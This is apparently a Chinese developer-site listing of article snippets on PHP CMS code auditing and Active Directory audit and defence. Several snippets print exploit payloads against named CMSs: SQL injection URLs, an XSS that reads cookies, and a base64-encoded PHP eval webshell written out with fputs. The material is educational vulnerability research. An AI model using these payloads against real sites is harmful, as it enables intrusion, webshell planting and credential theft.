- 综合排序
- 最热优先
- 最新优先
集中化、实时化、合规化:企业AD审计的三大转型方向
本文将深入剖析原生AD审计的固有局限,阐述自动化集中审计方案的关键价值,并为企业构建有效、可审计、合规的AD安全体系提供清晰的路线图。 二、 自动化审计方案:构建主动、智能的安全中枢为克服原生审计的弊端,以艾体宝Lepide为代表的自动化AD审计解决方案应运而生,通过集中化、智能化处理实现了安全运营的范式转移。 对比维度原生AD审计(现状与不足)自动化审计方案(艾体宝Lepide核心优势)可见性日志分散,缺乏统一视图集中化管理:将所有日志聚合至单一、易访问的仓库,提供全局统一视图威胁检测无实时警报,被动响应实时威胁检测 、 AD安全审计的核心焦点:必须监控的关键组件有效的AD审计不应是漫无目的的记录,而需聚焦于高风险和关键风险领域。 Lepide的自动化实现为应对内外部审计,企业AD管理员必须能定期、自动地生成详实、准确的合规报告。
14510编辑于 2026-02-13- 来自专栏奝-大周
代码审计day9
目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹、执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。
51820发布于 2020-08-19 - 来自专栏艾体宝
艾体宝干货丨跨境合规解决方案:Lepide构建高效、安全的合规管理体系
制造商的安全事件报告义务于2026年9月11日起实施。其他所有规定自 2027年12月11日起开始执行。 以下是Lepide在合规报告方面的具体协助方式:实时数据活动监控与审计数据安全平台能够实时追踪文件服务器、Active Directory、数据库、Microsoft 365 等关键系统中的所有用户活动 国内法规/标准Lepide对应功能优势效果《个人信息保护法》(PIPL)· 实时用户行为监控 · 非授权访问预警 · 数据访问日志与审计 · 权限最小化策略实施个人信息合规保护、“谁动了数据一目了然”、 · 异常行为检测与告警 · AD权限变更监控 · 内部威胁审计内部安全治理能力、帮助企业落实“等保”中的审计要求等保2.0(等级保护制度)· 支持日志记录与留存 · 提供安全事件响应机制 更重要的是,Lepide能自动检测这些文件是否被设置为“所有人可见”或拥有不必要的过度权限。
58010编辑于 2025-06-03 - 来自专栏潇湘信安
搞HS的9CCMS代码审计小结
0x01 前言 今天在“搞基大队”的群里看到@六八表哥发的这篇9CCMS代码审计笔记,审计的版本为1.89,经六表哥同意转发至该公众号,该文章比较适合新手学习。 >'; var logo = ''; var myVideo=initVideo({ id:'myVideo', url:vPath, ad:{ 0x03 漏洞点2:后台广告添加文件写入 在后台php/admin/home/ad/adjs.php文件中,未对传递进来的数据进行过滤,并且直接写到了AdminAdJs.php文件中,可直接getshell /JCSQL/Admin/Ad/AdminAdJs.php","w"); fwrite($file,$postAdJs); fclose($file); ?> ? ? > payload: 9ccms');phpinfo();//( ? ?
1.8K10发布于 2021-03-10 - 来自专栏全栈程序员必看
centos7安装方法_ad9安装及激活成功教程教程
下一步 第3步:稍后安装操作系统 第4步:选择操作系统和版本 第5步:输入虚拟机名称和安装路径 第6步:设置磁盘大小,本文选择默认配置20G 第7步:自定义硬件 第8步:选择CentOS安装镜像文件 第9步 第7步: 设置好之后完成,保存接收更改 第8步: 选择网络和主机名 第9步: 安装位置与网络都已配置好,开始安装 第10步:系统安装的同时,设置root账户的密码,密码很重要,要记住!! 稍后安装操作系统 第4步:选择操作系统和版本 第5步:输入虚拟机名称和安装路径 第6步:设置磁盘大小,本文选择默认配置20G 第7步:自定义硬件 第8步:选择CentOS安装镜像文件 第9步 第7步: 设置好之后完成,保存接收更改 第8步: 选择网络和主机名 第9步: 安装位置与网络都已配置好,开始安装 第10步:系统安装的同时,设置root账户的密码,密码很重要,要记住!
1.7K30编辑于 2022-11-09 - 来自专栏全栈程序员必看
代码审计系列:久草CMS(9CCMS)V1.9
前言 偶然看到一篇9CCMS(久草CMS) V1.9 弱口令+后台拿shell的文章 兴起去找来源码看看,下载源码 审计了下有下面这些洞 1、前台反射XSS 在文件static/home/videojs >'; var logo = ''; var myVideo=initVideo({ id:'myVideo', url:vPath, ad:{ pre:{ url:'', link:'', Play=%27;alert(document.cookie);%27 2、后台广告添加文件写入 在php/admin/home/ad/adjs.php文件中有: <? /JCSQL/Admin/Ad/AdminAdJs.php","w"); fwrite($file,$postAdJs); fclose($file); ? > 未对传递进来的数据进行过滤 并且直接写到了/JCSQL/Admin/Ad/AdminAdJs.php文件中 可直接getshell 不过无法执行命令 要用蚁剑插件绕过 3、密码修改文件写入
4.3K40编辑于 2022-11-02 - 来自专栏Cyber Security
代码审计-PHP原生开发篇&SQL注入&数据库监控&正则搜索&文件定位&静态分析
where.*= 正则-ad_js.php->getone()->无过滤->有输出payload注入 Poc: ad_js.php? ad_id=1 union select 1,2,3,4,5,6,database() 2、emlog-CNVD-1Day-常规注入审计分析 功能追踪-功能点文件SQL执行代码函数调用链追踪 审计流程 action=delbyip&ip=127.0.0.1%27and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%20--+&token=11f3f9cb7e78e3f88e39ea5678939b7d 3、emlog-CNVD-1Day-2次注入审计分析 语句监控-数据库SQL监控排查可利用语句定向分析 审计流程: 数据库监控->user.php无可控->nickname->添加不可控->data.php data.php 导入文件时执行SQL文件中语句,带入Payload INSERT INTO emlog_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg
24810编辑于 2024-07-18 - 来自专栏FreeBuf
通过 BlueCMS 学习 php 代码审计
先记录下我目前学习php代码审计的过程: php基础语法巩固 -> php特性 -> 各漏洞挖掘方法 -> 早期CMS程序代码审计实战 -> MVC模式程序代码审计实战 网上已经有很多讲解如何去审计各种 '/include/common.inc.php'; $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =". $ad_id); if($ad['time_set'] == 0) { $ad_content = $ad['content']; } echo "<! x-www-form-urlencoded X_FORWARDED_FOR: 192.168.44.1',user())# Connection: close Cookie: PHPSESSID=8d9d7ed9da5a96ac9b0093dceed684f9
2.1K30发布于 2021-09-16 - 来自专栏红队蓝军
从多个基础CMS中学习代码审计
代码审计概念什么是代码审计?代码审计是在一个编程中对源代码旨在发现错误、安全漏洞或违反编程约定的项目。 说人话就是找它这些代码中可能存在问题的地方,然后看它是否真的存在漏洞。 一般代码审计的话都是类似于这种灰盒测试的。 php @fputs(fopen('shell.php','w'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+'));? >//PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+为<?php @eval($_POST[1])?>然后我们去访问1.php 此时再看这个文件夹下 成功写入,原理就是这样。 php @fputs(fopen('shell.php','w'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+'));?
73010编辑于 2023-07-31 - 来自专栏quan9i的安全笔记
从多个基础CMS入坑代码审计
代码审计 概念 什么是代码审计? 代码审计是在一个编程中对源代码旨在发现错误、安全漏洞或违反编程约定的项目。 说人话就是找它这些代码中可能存在问题的地方,然后看它是否真的存在漏洞。 一般代码审计的话都是类似于这种灰盒测试的。 php @fputs(fopen('shell.php','w'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+'));? > //PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+为<?php @eval($_POST[1])? php @fputs(fopen('shell.php','w'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+'));?
1.1K90编辑于 2023-05-18 - 来自专栏quan9i的安全笔记
小白的代码审计初始之路
声明 文章首发于先知社区https://xz.aliyun.com/t/11553 代码审计 概念 什么是代码审计? 代码审计是在一个编程中对源代码旨在发现错误、安全漏洞或违反编程约定的项目。 一般代码审计的话都是类似于这种灰盒测试的。 php @fputs(fopen('shell.php','w'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+'));? > //PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+为<?php @eval($_POST[1])? php @fputs(fopen('shell.php','w'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzFdKT8+'));?
99170编辑于 2023-05-18 - 来自专栏Khan安全团队
使用 AD 诱饵检测 LDAP 枚举和Bloodhound 的 Sharphound 收集器
image.png 现在,攻击者使用从 Active Directory(使用 SharpHound)收集的信息来理解 AD 数据并对其进行分析以了解目标组织的 AD 结构,并找出各种有趣的事实和快捷路径以访问域管理员和不同主机上的用户权限等 Directory 收集数据,如您在代码中所见: https://github.com/BloodHoundAD/SharpHound/blob/41516e778ea186e144e4494f2e070cdb9aa878b9 创建诱饵帐户是为了确保我们仅在少数诱饵帐户上启用审计日志记录,而不是对所有对象启用审计日志记录,以最大限度地减少噪音。 Access” /Success:Enable image.png 现在启用了所需的审计策略,我们现在将创建诱饵对象。 为此,以下是 AD 用户和计算机 MMC 的步骤: 右击计算机对象——属性——进入安全>高级>审计并添加一个新的审计条目 添加一个新的校长“每个人” 从“适用于”下拉菜单中,选择“仅此对象” 取消选中所有主要权限
3.6K20编辑于 2021-12-27 - 来自专栏信安之路
无需登录域控服务器也能抓 HASH 的方法
关于 Active Directory 复制 域控制器 (DC) 是 Active Directory (AD) 环境的核心。 AD 使用多个计数器和表来确保每个 DC 都具有全部属性和对象的最新信息,并防止任何无休止的循环复制。 AD 使用命名上下文 (NC)(也称为目录分区)来分段复制。 它可能在您的环境中有所不同) 按照以下路径启用审核登录事件: 计算机配置 --> Windows 设置 --> 安全设置 --> 高级审计策略配置 --> 审计策略 --> DS 访问 --> 审计目录服务访问 event_id :4624 logon_type :9 logon_process_name :seclogo 在上述查询中,我们可以搜索包含 logon_type 9 和 logon_process_name event_id : 4662 log_name : "Security" object_properties : ( "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"或"1131f6ad
3.6K10编辑于 2022-04-07 - 来自专栏Khan安全团队
蜜罐账户的艺术:让不寻常的看起来正常
组策略首选项密码蜜罐(不一定是帐户):在每个域的 DC 上的 SYSVOL 共享中创建一个随机 GUID 文件夹名称,并在该文件夹上设置一个 SACL(审计条目)(确保域控制器审计配置为启用对象访问 - 高级审计策略配置中的审计文件系统)。 > <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"> <User clsid="{DF5F1855-51E5-4d24-8B1A-D<em>9</em>BDE98BA1D1 # Default Domain Controllers Policy 6AC1786C-016F-11D2-945F-00C04fB984F<em>9</em> IF ( ($RandomGUID -eq '31B2F340 -016D-11D2-945F-00C04FB984F<em>9</em>') -OR ($RandomGUID -eq '6AC1786C-016F-11D2-945F-00C04fB984F<em>9</em>') ) { $RandomGUID2
2.5K10编辑于 2022-01-24 - 来自专栏小石头
Harbor docker 部署安装
另外,Harbor也提供了高级的安全特性,诸如用户管理,访问控制和活动审计等。 AD/LDAP 支持 : Harbor可以集成企业内部已有的AD/LDAP,用于鉴权认证管理。 审计管理 : 所有针对镜像仓库的操作都可以被记录追溯,用于审计管理。 Database:为core services提供数据库服务,负责储存用户权限、审计日志、Docker image分组信息等数据。 docker-compose 测试是否安装成功 [root@server1 ~]# docker-compose --version docker-compose version 1.23.2, build 1110ad01 : Pull complete 930bda195c84: Pull complete 78bf9a5ad49e: Pull complete Digest: sha256:e5dd9dbb37df5b731a6688fa49f4003359f6f126958c9c928f937bec69836320
1.7K10编辑于 2022-11-10 - 来自专栏sktj
H3C运维审计系统 Web配置指导(笔记)
1、首页显示统计信息 2、首页:一周运维统计 3、有审计功能,最近运维记录 4、具有管理用户的功能(用户的增删改查) 5、有SSH功能 6、具有管理用户组的功能(用户组的增删改查) 7、具有管理部门的功能 (部门的增删改查,部门中可添加用户和资产) 8、用户可绑定令牌 9、用户可采用USBKEY 10、具有管理主机的功能(主机的增删改查,主机账号密码的配置) 11、主机的配置:是否开启,历史会话审批,实时会话监控 15、自动运维功能(自己写脚本) 16、运维授权功能:配置运维策略:IP黑名单,以下命令会阻断会话,一下命令需要审批,黑名单不允许执行以下命令 17、系统,系统配置,安全配置 18、审计,会话审计,所有会话 ;审计,会话审计,事件查询 19、系统,系统配置,安全配置:密码尝试次数,锁定时长,重计计数器,登录超时 20、系统配置:网络配置,SNMP配置,邮件告警配置,AD域认证配置,LDAP认证配置,RADIUS
1K20编辑于 2022-05-24 - 来自专栏信安之路
某套颜色 CMS 的几处后台 Getshell
在某资源站上发现一个专门搞颜色的 CMS (说啥专注 X 站),于是下载下来审计一波 CMS 的地址: d3d3LjljY21zLm5ldA== 下载 1.7 的版本,发现其并未与数据库交互,而是用一种叫 审计该文件,发现一处地方 在statistics.php 文件 第 52 行出 include一个变量 $ad_top_json_url ? 在文件adminx/admin_ad/ad.php 52 行处 ? 包含的文件为 Jccms_json/ad/ad_js/ad.json ? 以上是该 CMS3 处后台 RCE 的地方,该 cms 刚开始审计有点无处下手的感受,因为没有与数据库交互,很多地方也做了转义,但是如果仔细去看每个功能,会发现很多可以利用的地方,因为本人刚开始学审计. 可能遗漏了很多可以审查的地方,希望各位表哥多多包容同时也希望跟我一样在学习审计的朋友能够耐心的去阅读源码。
75120发布于 2019-10-29 - 来自专栏黑白天安全团队
BlueCMS_V1.6:审计过程与漏洞分析
漏洞分析 丢进seay里面(新建项目->选择bluecms安装目录->自动审计->开始) 1.数字型SQL注入 产生此漏洞的文件为ad_js.php ? seay显示19行的ad_id变量存在sql注入,而变量ad_id是从 trim():函数移除字符串两侧的空白字符或其他预定义字符。 WHERE ad_id =". 9. 后台大量漏洞 漏洞有点多,就先不写了? 结束语 第一次尝试cms审计,利用的方式写的也比较单一,还有一些漏洞没有一一列出来。 这次入门级的BlueCMS审计算是自己入坑代码审计的第一步吧。同时也希望这篇文章可以帮助到像我一样的初学者。最后我还想说慢慢走比较快 文章中有什么不足和错误的地方还望师傅们指正。
3.4K00发布于 2021-03-16 - 来自专栏网络安全技术点滴分享
使用WinDbg调试器分析内核对象:深入ALPC端口与句柄追踪
地址ffffe2843b1b0060处的对象头包含关键信息,如引用计数、句柄计数,以及可能的安全或审计信息。 以下是输出结果的分解:进程 ffffe2843ad8c080:这表明在内存地址ffffe2843ad8c080的进程内,没有找到引用指定对象地址(ffffe2843b1b0090)的句柄。 1ac: 条目 ffff8003244fe6b0 授予访问权限 1f0001 (继承) (审计):这一行详细说明了unsecapp.exe进程中的一个特定句柄(标识符1ac)。 十六进制值1f0001描述了具体的访问权限(如读、写、执行),包括继承(Inherit)和审计(Audit)标志。 3LJ623yfnHlTV9eLIVY9Qsx0oCCFKygC1Hmp1Cpdt/bhMBsNRglx48AQg==
24710编辑于 2026-02-11 - 来自专栏小白安全
Freebuf漏斗专栏之代码审计| Axublog前台SQL注入到后台GetShell
/theme.php,打开目标文件进行审计,经过审计发现改文件还存在其他多个漏洞,本篇先不做分析。 g=arthit&id=-1+%55NION+ALL+%53ELECT+1,2,3,4,5,6,adnaa,8,9,10,11,12 from axublog_adusers ? g=arthit&id=-1+%55NION+ALL+%53ELECT+1,2,3,4,5,6,adpss,8,9,10,11,12 from axublog_adusers ? 6. $key : EABAX::getAppInf('KEY')); 9\. $keya = md5(substr($key, 0, 16)); 10\. $psw='yYxvHseLMURYWjMXuICtH2jsBTQNdXog43es9PZUng'; 48.echo authcode(@$psw, 'DECODE', 'key',0) 49.
1.2K70发布于 2018-04-16
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号